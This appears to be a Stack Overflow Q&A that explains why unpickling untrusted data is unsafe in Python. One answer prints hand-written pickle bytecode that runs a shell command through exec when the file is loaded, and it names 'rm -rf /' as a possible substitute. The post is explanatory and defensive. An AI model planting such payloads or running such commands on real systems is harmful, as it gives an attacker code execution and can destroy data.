python - Untrusted pickle source

Question

From the python docs for pickle :

Warning The pickle module is not secure. Only unpickle data you trust.

What would be an example of pickling and then un-pickling data that would do something malicious? I've only ever used pickle to save objects that don't necessarily json encode well (date, decimal, etc.) so I don't have much experience with it or what it's capable outside of being a "simpler json" encoder.

What would be an example of something malicious that could be done with it?

Answer 1

Like Chase said, functions can be executed by unpickling. According to this source: https://intoli.com/blog/dangerous-pickles/, pickled objects are actually stored as bytecode instructions which are interpreted on opening (similar to Python itself). By writing pickle bytecode, it's possible to make a pickle "program" to do anything.

Here I made a pickle program to run the bash command say "malicious code", but you could run commands like rm -rf / as well.

I saved the following bytecode to a file:

c__builtin__
exec
(Vimport os; os.system('say "malicious code"')
tR.

and then unpickled it with:

import pickle
loadfile = open('malicious', 'rb')
data = pickle.load(loadfile)

I immediately heard some "malicious code".